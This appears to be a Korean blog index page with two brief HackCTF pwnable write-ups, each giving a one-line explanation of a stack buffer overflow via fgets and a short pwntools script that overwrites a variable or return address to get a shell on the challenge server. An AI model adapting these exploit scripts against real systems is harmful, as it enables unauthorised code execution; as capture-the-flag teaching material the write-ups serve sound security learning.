HackCTF/pwnable (10) 썸네일형 리스트형 HackCTF - Basic_BOF #2 v5에는 sup이라는 함수가 들어있는거 같고 fgets 에서 오버플로우로 shell 함수로 덮을 수 있다 from pwn import * r = remote('ctf.j0n9hyun.xyz', 3001) e = ELF('./bof_basic2') payload = 'A'*(128) payload += p32(e.sym['shell']) r.sendline(payload) r.interactive() Hackctf - Basic_BOF #1 fgets에서 오버플로우가 발생하고 v5를 0xDEADBEEF로 바꾸면 쉘이 실행되는 간단한 문제이다 from pwn import * r = remote('ctf.j0n9hyun.xyz', 3000) payload = 'A'*40 payload += p32(0xdeadbeef) r.sendline(payload) r.interactive() 이전 1 2 다음